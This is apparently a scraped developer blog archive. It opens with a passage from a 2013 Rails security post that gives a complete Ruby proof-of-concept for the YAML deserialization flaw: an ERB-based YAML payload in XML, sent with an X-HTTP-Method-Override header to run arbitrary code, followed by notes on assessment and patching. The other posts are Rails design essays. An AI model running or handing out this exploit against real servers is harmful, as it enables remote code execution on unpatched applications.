# Copyright (c) 2013 Bryan Helmkamp, Postmodern, GPLv3.0 require "net/https" require "uri" require "base64" require "rack" url = ARGV[0] code = File.read(ARGV[1]) # Construct a YAML payload wrapped in XML payload = <<-PAYLOAD.strip.gsub("\n", " ") <fail type="yaml"> --- !ruby/object:ERB template: src: !binary |- #{Base64.encode64(code)} </fail> PAYLOAD # Build an HTTP request uri = URI.parse(url) http = Net::HTTP.new(uri.host, uri.port) if uri.scheme == "https" http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_NONE end request = Net::HTTP::Post.new(uri.request_uri) request["Content-Type"] = "text/xml" request["X-HTTP-Method-Override"] = "get" request.body = payload # Print the response response = http.request(request) puts "HTTP/1.1 #{response.code} #{Rack::Utils::HTTP_STATUS_CODES[response.code.to_i]}" response.each { |header, value| puts "#{header}: #{value}" } puts puts response.body

There’s not much to it beyond the payload itself. The only interesting detail is the use of the X-Http-Method-Override header which instructs Rails to interpret the POST request as a GET.

Originally reports indicated that the vulnerability could only be used on POST/PUT-accessible endpoints. With this trick, we can send a POST (with an XML body) which the Rails router resolves as a GET. This makes it even easier to exploit because you don’t have to identify a POST-accessible URL for each application.

How It Works

Knowing that Rails will YAML.load the payload, the only difficulty is building a tree of objects that, when deserialized, executes arbitrary Ruby code in the payload. The object graph must be constructed using only classes that are present in the process.

This proof of concept uses ERB, a Ruby object that conveniently is designed to hold Ruby code in its @src instance variable, and execute it when #result is called. The only thing missing is triggering the #result call. Suffice it to say, a slighlty more complex YAML payload can achieve this. I’ve decided to omit the exact specifics here, but I’m aware of two vectors:

Ruby’s YAML parser calls #init_with, a hook that objects can define to control YAML deserialization. So any class that defines #init_with and also calls methods on its own instance variables in it could be leveraged to trigger a call into the malicious code.
Ruby’s YAML parser can also trigger the invokation of the #[]= (hash setter) method on objects it is building, so objects that take dangerous action based on assigned hash values are also exploitable.

Assessment

With the app source, check for the presence of an affected Rails version and the absence of a workaround. Assessing vulnerability without source code access is slightly more complex but still easy. By sending in payloads and checking the server’s response, you can detect if the application seems to be performing YAML deserialization of params.

For example, Metasploit now includes a scanner that sends two requests, one with a valid YAML object and one with an invalid YAML. If the server responds differently (for example, if it returns a 500 for the invalud YAML only), it is likely deserializing the YAML and vulnerable.

Mitigation

The simplest fix is to upgrade to a patched Rails releases: 3.2.11, 3.1.10, 3.0.19 or 2.3.15. If you cannot upgrade immediately, consider applying one of the published patches.

Workarounds exist for Rails 2.3 and above to disable the dangerous functionality from an initializer without requiring a Rails upgrade.

Because of the severity of this issue, if you cannot upgrade or patch your Rails version immediately, consider urgently applying the workaround.

External Links

Thanks to Adam Baldwin of Lift Security for reviewing this post.

DCI, Concerns and Readable Code

Dec 19, 2012

7 min read

Our latest post comes from Giles Bowkett. Giles recently wrote a book, Rails As She Is Spoke, which explores Rails’ take on OOP and its implications. It’s an informative and entertaining read, and you should buy it.

A few days ago I wrote a blog post arguing that rails developers should take DCI seriously. Be careful what you wish for! A tumultuous brouhaha soon ensued on Twitter. I can’t necessarily take the credit for that, but I’m glad it happened, because one of the people at the center of the cyclone, Rails creator David Heinemeier Hansson, wrote a good blog post on ActiveSupport::Concern, which included a moment of taking DCI seriously.

[…] breaking up domain logic into concerns is similar in some ways to the DCI notion of Roles. It doesn’t have the run-time mixin acrobatics nor does it have the “thy models shall be completely devoid of logic themselves” prescription, but other than that, it’ll often result in similar logic extracted using similar names.

DCI (data, context, and interaction) is a paradigm for structuring object-oriented code. Its inventor, Trygve Reenskaug, also created MVC, an object-oriented paradigm every Rails developer should be familiar with. Most Ruby i mplementations use mixins quite a lot, and there is indeed some similarity there.

However, there’s a lot more to DCI than just mixins, and since I’ve already gone into detail about it elsewhere, as have many others, I won’t get into that here. I’m very much looking forward to case studies from people who’ve used it seriously. Likewise, there are a lot of good reasons to feel cautious about using mixins, either for Rails concerns or for DCI, but that discussion’s ongoing and deserves (and is receiving) several blog posts of its own.

What I want to talk about is this argument in Hansson’s blog post:

I find that concerns are often just the right amount of abstraction and that they often result in a friendlier API. I far prefer current_account.posts.visible_to(current_user) to involving a third query object. And of course things like Taggable that needs to add associations to the target object are hard to do in any other way. It’s true that this will lead to a proliferation of methods on some objects, but that has never bothered me. I care about how I interact with my code base through the source.

I added the emphasis to the final sentence because I think it’s far more important than most people realize.

To explain, I want to draw an example from my new book Rails As She Is Spoke, which has a silly title but a serious theme, namely the ways in which Rails departs from traditional OOP, and what we can learn from that. The example concerns the familiar method url_for. But I should say “methods,” because the Rails code base (as of version 3.2) contains five different methods named url_for.

The implementations for most of these methods are hideous, and they make it impossible not to notice the absence of a Url class anywhere in the Rails code base — a truly bizarre bit of domain logic for a Web framework not to model — yet these same, hideously constructed methods enable application developers to use a very elegant API:

url_for controller: foo, action: bar, additional: whatnot

Consider again what Hansson said about readable code:

I care about how I interact with my code base through the source.

I may be reading too much into a single sentence here, but after years of Rails development, I strongly believe that Rails uses this statement about priorities as an overarching design principle. How else do you explain a Web framework that does not contain a Url class within its own internal domain logic, yet provides incredible conveniences like automated migrations and generators for nearly every type of file you might need to create?

The extraordinary internal implementation of ActiveRecord::Base, and its extremely numerous modules, bends over backwards to mask all the complexity inherent in instantiating database-mapping objects. It does much, much less work to make its own internal operations easy to understand, or easy to reason about, or easy to subclass, and if you want to cherry-pick functionality from ActiveRecord::Base, your options span a baffling range from effortless to impossible.

Consider a brief quote from this recent blog post on the params object in Rails controllers:

In Ruby, everything is an object and this unembarrassed object-orientation gives Ruby much of its power and expressiveness. […] In Rails, however, sadly, there are large swathes which are not object oriented, and in my opinion, these areas tend to be the most painful parts of Rails.

I agree with part of this statement. I think it’s fair to say that Ruby takes its object-oriented nature much more seriously than Rails does. I also agree that customizing Rails can be agonizingly painful, whenever you dip below the framework’s beautifully polished surface into the deeper realms of its code, which is sometimes object-oriented and sometimes not. But if you look at this API:

url_for controller: foo, action: bar, additional: whatnot

It doesn’t look like object-oriented code at all. An object-oriented version would look more like this:

Url.new(:foo, :bar, additional: whatnot)

The API Rails uses looks like Lisp, minus all the aggravating parentheses.

(url_for ((controller, 'foo), (action, 'bar), (additional, whatnot)))

That API is absolutely not, in my opinion, one of “the most painful parts of Rails.” It’s one of the least painful parts of Rails. I argue in my book that Rails owes a lot of its success to creating a wonderful user experience for developers — making it the open source equivalent of Apple — and I think this code is a good example.

Rails disregards object orientation whenever being object-oriented stands in the way of a clean API, and I actually think this is a very good design decision, with one enormous caveat: when Rails first debuted, Rails took a very firm position that it was an opinionated framework very highly optimized for one (and only one) particular class of Web application.

If (and only if) every Rails application hews to the same limited range of use cases, and never strays from the same narrow path of limited complexity, then (and onlythen) it makes perfect sense to prioritize the APIs which developers see over their ability to reason about the domain logic of their applications and of the framework itself.

Unfortunately, the conditions of my caveat do not pertain to the overwhelming majority of Rails apps. This is why Rails 3 abandoned the hard line on opinionated software for a more conciliatory approach, which is to say that Rails is very highly optimized for a particular class of Web application, but sufficiently modular to support other types of Web applications as well.

If you take this as a statement about the characteristics of Rails 3, it’s outrageously false, but if you take it as a design goal for Rails 3 and indeed (hopefully) Rails 4, it makes a lot of sense and is a damn good idea.

In this context, finding “just the right amount of abstraction” requires more than just defining the most readable possible API. It also requires balancing the most readable possible API with the most comprehensible possible domain model. There’s an analogy to human writing: you can’t just write beautiful sentences and call it a day. If you put beautiful sentences on pages at random, you might have poetry, if you get lucky, but you won’t have a story.

This is an area where DCI demolishes concerns, because DCI provides an entire vocabulary for systematic decomposition. If there’s any guiding principle for decomposing models with concerns, I certainly don’t recall seeing it, ever, even once, in my 7 years as a Rails developer. As far as I can tell the closest thing is: “Break the class into multiple files if…”

There are too many lines of code.
It’s Tuesday.
It’s not Tuesday.

DCI gives developers something more fine-grained.

I’m not actually a DCI zealot; I’m waiting until I’ve built an app with DCI and had it running for a while before I make any strident or definitive statements. The Code Climate blog itself featured some alternative solutions to the overburdened models problem, and these solutions emphasize classes over mixins. You could do worse than to follow them to the letter. Other worthwhile alternatives exist as well; there is no silver bullet.

However, Rails concerns are just one way to decompose overburdened models. Concerns are appropriate for some apps and inappropriate for others, and I suspect the same is true of DCI. Either way, if you want to support multiple types of applications, with multiple levels and types of complexity, then making a blanket decision about “just the right amount of abstraction” is pretty risky, because that decision may in fact function at the wrong level of abstraction itself.

It doesn’t take a great deal of imagination to understand that different apps feature different levels of complexity, and you should choose which technique you use for managing complexity based on how much complexity you’re going to be managing. As William Gibson said, “the street finds its own uses for things,” and I think most Rails developers use Rails to build apps that are more complex than the apps Rails is optimized for. I’ve certainly seen apps where that was true, and in those apps, concerns did not solve the problem.

It’s possible this means people should be using Merb instead of Rails, although that train appears to have left the station (and of course it left the station on Rails).

Your Objects, the Unix Way

Nov 28, 2012

7 min read

Applying the Unix Philosophy to Object-Oriented Design

Today I’m thrilled to present a guest post from my friend John Pignata. John is Director of Engineering Operations at GroupMe.

In 1964, Doug McIlroy, an engineer at Bell Labs, wrote an internal memo describing some of his ideas for the Multics operating system. The surviving tenth page summarizes the four items he felt were most important. The first item on the list reads:

“We should have some ways of coupling programs like [a] garden hose – screw in another segment when it becomes necessary to massage data in another way.”

This sentence describes what ultimately became the Unix pipeline: the chaining together of a set of programs such that the output of one is fed into the next as input. Every time we run a command like tail -5000 access.log | awk '{print $4}' | sort | uniq -c we’re benefiting from the legacy of McIlroy’s garden hose analogy. The pipeline enables each program to expose a small set of features and, through the interface of the standard streams, collaborate with other programs to deliver a larger unit of functionality.

It’s mind-expanding when a Unix user figures out how to snap together their system’s various small command-line programs to accomplish tasks. The pipeline renders each command-line tool more powerful as a stage in a larger operation than it could have been as a stand-alone utility. We can couple together any number of these small programs as necessary and build new tools which add specific features as we need them. We can now speak Unix in compound sentences.

Without the interface of the standard streams to allow programs to collaborate, Unix systems might have ended up with larger programs with duplicative feature sets. In Microsoft Windows, most programs tend to be their own closed universes of functionality. To get word count of a document you’re writing on a Unix system, you’d run wc -w document.md. On a system running Windows you’d likely have to boot the entire Microsoft Word application in order to get a word count of document.docx. The count functionality of Word is locked in the context of use of editing a Word document.

Just as Unix and Windows are composed of programs as units of functionality, our systems are composed of objects. When we build chunky, monolithic objects that wrap huge swaths of procedural code, we’re building our own closed universes of functionality. We’re trapping the features we’ve built within a given context of use. Our objects are obfuscating important domain concepts by hiding them as implementation details.

In coarse-grained systems, each single object fills multiple roles increasing their complexity and resistance to change. Extending an object’s functionality or swapping out an implementation for another sometimes involves major shotgun surgery. The battle against complexity is fought within the definition of every object in your system. Fine-grained systems are composed of objects that are easier to understand, to modify, and to use.

Some years after that memo, McIlroy summarized the Unix philosophy as: “write programs that do one thing and do it well. Write programs to work together.” Eric Raymond rephrased this in The Art of Unix Programming as the Rule of Modularity: “write simple parts connected by clean interfaces.” This philosophy is a powerful strategy to help us manage complexity within our systems. Like Unix, our systems should consist of many small components each of which are focused on a specific task and work with each other via their interfaces to accomplish a larger task.

Everything But the Kitchen Sink

Let’s look at an example of an object that contains several different features. The requirement represented in this code is to create an old-school web guestbook for our home page. For anyone who missed the late nineties, like its physical analog a web guestbook was a place for visitors to acknowledge a visit to a web page and to leave public comments for the maintainer.

When we start the project the requirements are straightforward: save a name, an IP address, and a comment from any visitor that fills out the form and display those contents in an index view. We scaffold up a controller, generate a migration, a new model, sprinkle web design in some ERB templates, high five, and call it a day. This is a Rails system, I know this.

Over time our requirements begin growing and we slowly start adding new features. First, in real-life operations we realize that spammers are posting to the form so we want to build a simple spam filter to reject posts containing certain words. We also realize we want some kind of rate-limiting to prevent visitors from posting more than one message per day. Finally, we want to post to Twitter when a visitor signs our guestbook because if we’re going to be anachronistic with our code example, let’s get really weird with it.

require "set" class GuestbookEntry < ActiveRecord::Base SPAM_TRIGGER_KEYWORDS = %w(viagra acne adult loans xxx mortgage).to_set RATE_LIMIT_KEY = "guestbook" RATE_LIMIT_TTL = 1.day validate :ensure_content_not_spam, on: :create validate :ensure_ip_address_not_rate_limited, on: :create after_create :post_to_twitter after_create :record_ip_address private def ensure_content_not_spam flagged_words = SPAM_TRIGGER_KEYWORDS & Set.new(content.split) unless flagged_words.empty? errors[:content] << "Your post has been rejected." end end def ensure_ip_address_not_rate_limited if $redis.exists(RATE_LIMIT_KEY) errors[:base] << "Sorry, please try again later." end end def post_to_twitter client = Twitter::Client.new(Configuration.twitter_options) client.update("We had a visitor! #{name} said #{content.first(50)}") end def record_ip_address $redis.setex("#{RATE_LIMIT_KEY}:#{ip_address}", RATE_LIMIT_TTL, "1") end end

These features are oversimplified but set that aside for the purposes of this example. The above code shows us a hodgepodge of entwined features. Like the Microsoft Word example of the word count feature, the features we’ve built are locked within the context of creating a GuestbookEntry.

This kind of approach has several real-world implications. For one, the tests for this object likely exercise some of these features in the context of saving a database object. We don’t need to roundtrip to our database in order to validate that our rate limiting code is working, but since we’ve hung it off an after_create callback that’s likely what we might do because that’s the interface our application is using. These tests also likely littered with unrelated details and setup due to the coupling to unrelated but neighboring behavior and data.

At a glance it’s difficult to untangle which code relates to what feature. When looking at the code we have to think about at each line to discern which of the object’s behavior that line is principally concerned with. Clear naming helps us in this example but in a system where each behavior was represented by a domain object, we’d be able to assume that a line of code related to the object’s assigned responsibility.

Lastly, it’s easy for us to glance over the fact that we have, for example, the acorn of a user content spam filter in our system because it’s a minor detail of another object. If this were its own domain concept it would be much clearer that it was a first-class role within the system.

Applying the Unix Philosophy

Let’s look at this implementation through the lens of the Rule of Modularity. The above code fails the “simple parts, clean interfaces” sniff test. In our current factoring, we can’t extend or change these features without diffusing more details about them into the GuestbookEntry object. The interface by which our model uses this behavior through internal callbacks trigged through the object’s lifecycle. There are no external interfaces to these features despite the fact that each has their own behavior and data. This object now has several reasons to change.

Let’s refactor these features by extracting this behavior to independent objects to see how these shake out as stand-alone domain concepts. First we’ll extract the code in our spam check implementation into its own object.

`require "set" class UserContentSpamChecker TRIGGER_KEYWORDS = %w(viagra acne adult loans xrated).to_set def initialize(content) @content = content end def spam? flagged_words.present? end private def flagged_words TRIGGER_KEYWORDS & @content.split end end`

Features like this have serious sprawl potential. When we first see the problem of abuse we’re likely we respond with the simplest thing that could work. There’s usually quite a bit of churn in this code as our combatants expose new weaknesses in our implementation. The rate of change of our spam protection strategy is inherently different than that of our GuestbookEntry persistence object. Identifying our UserContentSpamChecker as its own dedicated domain concept and establishing it as such will allow us to more easily maintain and extend this functionality independently of where it’s being used.

Next we’ll extract our rate limiting code. Some small changes are required to decouple it fully from the guestbook such as the addition of a namespace.

`class UserContentRateLimiter DEFAULT_TTL = 1.day def initialize(ip_address, namespace, options = {}) @ip_address = ip_address @namespace = namespace @ttl = options.fetch(:ttl, DEFAULT_TTL) @redis = options.fetch(:redis, $redis) end def exceeded? @redis.exists?(key) end def record @redis.setex(key, @ttl, "1") end private def key "rate_limiter:#{@namespace}:#{@ip_address}" end end`

Now that we have a stand-alone domain object, more advanced requirements for this rate limiting logic will only change this one object. Our tests can exercise this feature in isolation apart from any potential consumer of its functionality. This will not only speed up tests, but help future readers of the code in reading the tests to understand the feature more quickly.

Finally we’ll extract our call to the Twitter gem. It’s tiny, but there’s good reason to keep it separate from our GuestbookEntry. Since Twitter and the gem are third-party APIs, we’d like to isolate the coupling to an adapter object that we use to hide the nitty-gritty details of sending a tweet.

`class Tweeter def post(content) client.update(content) end private def client @client ||= Twitter::Client.new(Configuration.twitter_options) end end`

Now that we have these smaller components, we can change our GuestbookEntryobject to make use of them. We’ll replace the extracted logic with calls to the objects we’ve just created.

class GuestbookEntry < ActiveRecord::Base validate :ensure_content_not_spam, on: :create validate :ensure_ip_address_not_rate_limited, on: :create after_create :post_to_twitter after_create :record_ip_address private def ensure_content_not_spam if UserContentSpamChecker.new(content).spam? errors[:content] << "Post rejected." end end def ensure_ip_address_not_rate_limited if rate_limiter.exceeded? errors[:base] << "Please try again later." end end def post_to_twitter Tweeter.new.post("New visitor! #{name} said #{content.first(50)}") end def record_ip_address rate_limiter.record end def rate_limiter @rate_limiter ||= UserContentRateLimiter.new(ip_address, :guestbook) end end

This new version is only a couple of lines shorter than our original implementation but it knows much less about its constituent parts. Many of the details of the “how” these features are implemented have found a dedicated home in our domain with our model calling those collaborators to accomplish the larger task of creating a GuestbookEntry. These features are now independently testable and individually addressable. They are no longer locked in the context of creating a GuestbookEntry. At the meager cost of a few more files and some more code we now have simpler objects and a better set of interfaces. These objects can be changed with less risk of ripple effects and their interfaces can be called by other objects in the system.

Wrapping Up

“Good code invariably has small methods and small objects. I get lots of resistance to this idea, especially from experienced developers, but no one thing I do to systems provides as much help as breaking it into more pieces.” – Kent Beck, Smalltalk Best Practice Patterns

The Unix philosophy illustrates that small components that work together through an interface can be extraordinarily powerful. Nesting an aspect of your domain as an implementation detail of a specific model conflates responsibilities, bloats code, makes tests less isolated and slower, and hides concepts that should be first-class in your system.

Don’t let your domain concepts be shy. Promote them to full-fledged objects to make them more understandable, isolate and speed up their tests, reduce the likelihood that changes in neighboring features will have ripple effects, and provide the concepts a place to evolve apart from the rest of the system. The only thing we know with certainty about the futures of our systems is that they will change. We can design our systems to be more amenable to inevitable change by following the Unix philosophy and building clean interfaces between small objects that have one single responsibility.

Why Ruby Class Methods Resist Refactoring

Nov 14, 2012

7 min read

One of the most common questions I received following my 7 Patterns to Refactor Fat ActiveRecord Models post was “Why are you using instances where class methods will do?”. I’d like to address that. Simply put:

I prefer object instances to class methods because class methods resist refactoring.

To illustrate, let’s look at an example background job for syncing data to a third-party analytics service:

The job iterates over each user sending a hash of attributes as an HTTP POST. If a SocketError is raised, it gets wrapped as a SyncToAnalyticsService::ConnectionFailure, which ensures it gets categorized properly in our error tracking system.

The SyncToAnalyticsService.perform method is pretty complex. It certainly has multiple responsibilities. The Single Responsibility Principle (SRP) can be thought of as fractal, applying at a finer grained level of detail to all of applications, modules, classes and methods. SyncToAnalyticsService.perform is not a Composed Method because not all of the operations of the method are at the same level of abstraction.

One solution would be to apply Extract Method a few times. You’d end up with something like this:

This is a little better the original, but doesn’t feel right. It’s certainly not object oriented. It feels like a weird hybrid of procedural and functional programming, stuck in an object-based world. Additionally, you can’t easily declare the extracted methods private because they are at the class level. (You’d have to switch to an ugly class << self form.)

If I came across the original SyncToAnalyticsService implementation, I wouldn’t be eager to refactor only to end up with the above result. Instead, suppose we started with this:

Almost identical, but this time the functionality is in an instance method rather than a class method. Again, applying Extract Method we might end up with something like this:

Instead of adding class methods that have to pass around intermediate variables to get work done, we have methods like #account_attributes which memoize their results. I love this technique. When breaking down a method, extracting intermediate variables as memoized accessors is one of my favorite refactorings. The class didn’t start with any state, but as it was decomposed it was helpful to add some.

The result feels much cleaner to me. Refactoring to this feels like a clear win. There is now state and logic encapsulated together in an object. It’s easier to test because you can separate the creation of the object (Given) from the invokation of the action (When). And we’re not passing variables like the Account and Analytics::Client around everywhere.

Also, every piece of code that uses this logic won’t be coupled to the (global) class name. You can’t easily swap in new a class, but you can easily swap in a new instance. This encourages building up additional behavior with composition, rather than needing to re-open and expand classes for every change.

Refactoring note: I’d probably leave this class implemented as the last source listing shows. However, if the logic becomes more complex, this job is begging for a class to sync a single user to be split out.

So how does this relate to the premise of this article? I’m unlikely to see the opportunities for refactoring a class method because decomposing them produces ugly code. Starting with the instance form makes your refactoring options clear, and reduces friction to taking action on them. I’ve observed this effect many times in my own coding and also anecdotally across many Ruby teams over the years.

Objections

YAGNI (You Aren’t Going To Need It)

YANGI is an important principle, but misapplied in this case. If you open these classes in your editor, neither form is more or less complicated than the other. Saying “YAGNI an object here” is sort of like saying “YAGNI to indent with two spaces instead of a single tab.” The variants are only different stylistically. Applying YAGNI to object oriented design only make sense if there’s a difference in understandability (e.g. using one class versus two).

It Uses an Extra Object

Some people object on the basis that the instance form creates an additional object. That’s true, but in practice it doesn’t matter. Rails requests and background jobs create thousands upon thousands of Ruby objects. Optimizing object creation to lessen the stress on the Ruby garbage collector is a legitimate technique, but do it where it counts. You can only find out where it counts by measuring. It’s inconceivable that the single additional object that the instance variant creates will have a measurable impact on the performance of your system. (If you have a counter example with data, I’d love to hear about it.)

It’s Cumbersome to Call

Finally, some object that it is just easier to type:

That is true. In that case I simply define a convenience class method that builds the object and delegates down. In fact, that is one of the few cases I think class methods are okay. You can have your cake and eat it too, in this regard.

Wrapping Up

Begin with an object instance, even if it doesn’t have state or multiple methods right away. If you come back to change it later, you (and your team) will be more likely to refactor. If it never changes, the difference between the class method approach and the instance is negligible, and you certainly won’t be any worse off.

There are very few cases where I am comfortable with class methods in my code. They are either convenience methods, wrapping the act of initializing an instance and invoking a method on it, or extremely simple factory methods (no more than two lines), to allow collaborators to more easily construct objects.

What do you think? Which form do you prefer and why? Are there any pros/cons that I missed? Post a comment and let me know what you think!

P.S. If this sort of thing interests you, and you want to read more articles like it, you might like the Code Climate newsletter (see below). It’s just one email a month, and includes content about refactoring and object design with a Ruby focus.

Thanks to Doug Cole, Don Morrison and Josh Susser for reviewing this post.

7 Patterns to Refactor Fat ActiveRecord Models

Oct 17, 2012

7 min read

When teams use Code Climate to improve the quality of their Rails applications, they learn to break the habit of allowing models to get fat. “Fat models” cause maintenance issues in large apps. Only incrementally better than cluttering controllers with domain logic, they usually represent a failure to apply the Single Responsibility Principle (SRP). “Anything related to what a user does” is not a single responsibility.

Early on, SRP is easier to apply. ActiveRecord classes handle persistence, associations and not much else. But bit-by-bit, they grow. Objects that are inherently responsible for persistence become the de facto owner of all business logic as well. And a year or two later you have a User class with over 500 lines of code, and hundreds of methods in it’s public interface. Callback hell ensues.

As you add more intrinsic complexity (read: features!) to your application, the goal is to spread it across a coordinated set of small, encapsulated objects (and, at a higher level, modules) just as you might spread cake batter across the bottom of a pan. Fat models are like the big clumps you get when you first pour the batter in. Refactor to break them down and spread out the logic evenly. Repeat this process and you’ll end up with a set of simple objects with well defined interfaces working together in a veritable symphony.

You may be thinking:

“But Rails makes it really hard to do OOP right!”

I used to believe that too. But after some exploration and practice, I realized that Rails (the framework) doesn’t impede OOP all that much. It’s the Rails “conventions” that don’t scale, or, more specifically, the lack of conventions for managing complexity beyond what the Active Record pattern can elegantly handle. Fortunately, we can apply OO-based principles and best practices where Rails is lacking.

Don’t Extract Mixins from Fat Models

Let’s get this out of the way. I discourage pulling sets of methods out of a large ActiveRecord class into “concerns”, or modules that are then mixed in to only one model. I once heard someone say:

“Any application with an app/concerns directory is concerning.”

And I agree. Prefer composition to inheritance. Using mixins like this is akin to “cleaning” a messy room by dumping the clutter into six separate junk drawers and slamming them shut. Sure, it looks cleaner at the surface, but the junk drawers actually make it harder to identify and implement the decompositions and extractions necessary to clarify the domain model.

Now on to the refactorings!

1. Extract Value Objects

Value Objects are simple objects whose equality is dependent on their value rather than an identity. They are usually immutable. Date, URI, and Pathname are examples from Ruby’s standard library, but your application can (and almost certainly should) define domain-specific Value Objects as well. Extracting them from ActiveRecords is low hanging refactoring fruit.

In Rails, Value Objects are great when you have an attribute or small group of attributes that have logic associated with them. Anything more than basic text fields and counters are candidates for Value Object extraction.

For example, a text messaging application I worked on had a PhoneNumber Value Object. An e-commerce application needs a Money class. Code Climate has a Value Object named Rating that represents a simple A - F grade that each class or module receives. I could (and originally did) use an instance of a Ruby String, but Rating allows me to combine behavior with the data:

Every ConstantSnapshot then exposes an instance of Rating in its public interface:

Beyond slimming down the ConstantSnapshot class, this has a number of advantages:

The #worse_than? and #better_than? methods provide a more expressive way to compare ratings than Ruby’s built-in operators (e.g. < and >).
Defining #hash and #eql? makes it possible to use a Rating as a hash key. Code Climate uses this to idiomatically group constants by their ratings using Enumberable#group_by.
The #to_s method allows me to interpolate a Rating into a string (or template) without any extra work.
The class definition provides a convenient place for a factory method, returning the correct Rating for a given “remediation cost” (the estimated time it would take to fix all of the smells in a given class).

2. Extract Service Objects

Some actions in a system warrant a Service Object to encapsulate their operation. I reach for Service Objects when an action meets one or more of these criteria:

The action is complex (e.g. closing the books at the end of an accounting period)
The action reaches across multiple models (e.g. an e-commerce purchase using Order, CreditCard and Customer objects)
The action interacts with an external service (e.g. posting to social networks)
The action is not a core concern of the underlying model (e.g. sweeping up outdated data after a certain time period).
There are multiple ways of performing the action (e.g. authenticating with an access token or password). This is the Gang of Four Strategy pattern.

As an example, we could pull a User#authenticate method out into a UserAuthenticator:

And the SessionsController would look like this:

3. Extract Form Objects

When multiple ActiveRecord models might be updated by a single form submission, a Form Object can encapsulate the aggregation. This is far cleaner than using accepts_nested_attributes_for, which, in my humble opinion, should be deprecated. A common example would be a signup form that results in the creation of both a Company and a User:

I’ve started using Virtus in these objects to get ActiveRecord-like attribute functionality. The Form Object quacks like an ActiveRecord, so the controller remains familiar:

This works well for simple cases like the above, but if the persistence logic in the form gets too complex you can combine this approach with a Service Object. As a bonus, since validation logic is often contextual, it can be defined in the place exactly where it matters instead of needing to guard validations in the ActiveRecord itself.

4. Extract Query Objects

For complex SQL queries littering the definition of your ActiveRecord subclass (either as scopes or class methods), consider extracting query objects. Each query object is responsible for returning a result set based on business rules. For example, a Query Object to find abandoned trials might look like this:

You might use it in a background job to send emails:

Since ActiveRecord::Relation instances are first class citizens as of Rails 3, they make a great input to a Query Object. This allows you to combine queries using composition:

Don’t bother testing a class like this in isolation. Use tests that exercise the object and the database together to ensure the correct rows are returned in the right order and any joins or eager loads are performed (e.g. to avoid N + 1 query bugs).

5. Introduce View Objects

If logic is needed purely for display purposes, it does not belong in the model. Ask yourself, “If I was implementing an alternative interface to this application, like a voice-activated UI, would I need this?”. If not, consider putting it in a helper or (often better) a View object.

For example, the donut charts in Code Climate break down class ratings based on a snapshot of the codebase (e.g. Rails on Code Climate) and are encapsulated as a View:

I often find a one-to-one relationship between Views and ERB (or Haml/Slim) templates. This has led me to start investigating implementations of the Two Step View pattern that can be used with Rails, but I don’t have a clear solution yet.

Note: The term “Presenter” has caught on in the Ruby community, but I avoid it for its baggage and conflicting use. The “Presenter” term was introduced by Jay Fields to describe what I refer to above as “Form Objects”. Also, Rails unfortunately uses the term “view” to describe what are otherwise known as “templates”. To avoid ambiguity, I sometimes refer to these View objects as “View Models”.

6. Extract Policy Objects

Sometimes complex read operations might deserve their own objects. In these cases I reach for a Policy Object. This allows you to keep tangential logic, like which users are considered active for analytics purposes, out of your core domain objects. For example:

This Policy Object encapsulates one business rule, that a user is considered active if they have a confirmed email address and have logged in within the last two weeks. You can also use Policy Objects for a group of business rules like an Authorizer that regulates which data a user can access.

Policy Objects are similar to Service Objects, but I use the term “Service Object” for write operations and “Policy Object” for reads. They are also similar to Query Objects, but Query Objects focus on executing SQL to return a result set, whereas Policy Objects operate on domain models already loaded into memory.

7. Extract Decorators

Decorators let you layer on functionality to existing operations, and therefore serve a similar purpose to callbacks. For cases where callback logic only needs to run in some circumstances or including it in the model would give the model too many responsibilities, a Decorator is useful.

Posting a comment on a blog post might trigger a post to someone’s Facebook wall, but that doesn’t mean the logic should be hard wired into the Comment class. One sign you’ve added too many responsibilities in callbacks is slow and brittle tests or an urge to stub out side effects in wholly unrelated test cases.

Here’s how you might extract Facebook posting logic into a Decorator:

And how a controller might use it:

Decorators differ from Service Objects because they layer on responsibilities to existing interfaces. Once decorated, collaborators just treat the FacebookCommentNotifier instance as if it were a Comment. In its standard library, Ruby provides a number of facilities to make building decorators easier with metaprogramming.

Wrapping Up

Even in a Rails application, there are many tools to manage complexity in the model layer. None of them require you to throw out Rails. ActiveRecord is a fantastic library, but any pattern breaks down if you depend on it exclusively. Try limiting your ActiveRecords to persistence behavior. Sprinkle in some of these techniques to spread out the logic in your domain model and the result will be a much more maintainable application.

You’ll also note that many of the patterns described here are quite simple. The objects are just “Plain Old Ruby Objects” (PORO) used in different ways. And that’s part of the point and the beauty of OOP. Every problem doesn’t need to be solved by a framework or library, and naming matters a great deal.

What do you think of the seven techniques I presented above? What are your favorites and why? Have I missed any? Let me know in the comments!

P.S. If you found this post useful, you may want to subscribe to our email newsletter (see below). It’s low volume, and includes content about OOP and refactoring Rails applications like this.

Why Sublime Text 2?

Speed. It’s got the responsiveness of Vim/Emacs but in a full GUI environment. It doesn’t freeze/beachball. No need to install a special plugin just to have a workable “Find In Project” solution.
Polish. Some examples: Quit with one keystroke and windows and unsaved buffers are retained when you restart. Searching for files by name includes fuzzy matching and directory names. Whitespace is trimmed and newlines are added at the end of files. Configuration changes are applied instantly.
Split screen. I never felt like I missed this that much with TextMate, but I really appreciate it now. It’s ideal for having a class and unit test side-by-side on a 27-inch monitor.
Extensibility. The Python API is great for easily building your own extensions. There’s lots of example code in the wild to learn from. (More about this later.) ST2 support TextMate snippets and themes out-of-the-box.
Great for pair programming. TextMate people feel right at home. Vim users can use Vintage mode. When pairing with Vim users, they use command mode when they are driving. I just switch out of command mode and everything “just works”. (It also works on Linux, if that’s your thing.)
Updates. This is mainly just a knock on TextMate, but it’s comforting to see new dev builds pushed every couple weeks. The author also seems to be quite responsive in the user community. A build already shipped with support for retina displays, which I believe is scheduled for a TextMate release in 2014.

Getting Started

I’ve helped a handful of new ST2 users get setup over the past few months. Here are the steps I usually follow to take a new install from good to awesome:

Install the subl command line tool. Assuming ~/bin is in your path:

ln -s "/Applications/Sublime Text 2.app/Contents/SharedSupport/bin/subl" ~/bin/subl

It works like mate, but has more options. Check subl --help.
Install Package Control. Package Control makes it easy to install/remove/upgrade ST2 packages.Open the ST2 console with Ctrl+` (like Quake). Then paste this Python code from this page and hit enter. Reboot ST2. (You only need to do this once. From now on you’ll use Package Control to manage ST2 packages.)
Install the Soda theme. This dramatically improves the look and feel of the editor. Use Package Control to install the theme:

* Press ⌘⇧P to open the Command Palette. * Select "Package Control: Install Package" and hit Enter. * Type "Theme - Soda" and hit Enter to install the Soda package.

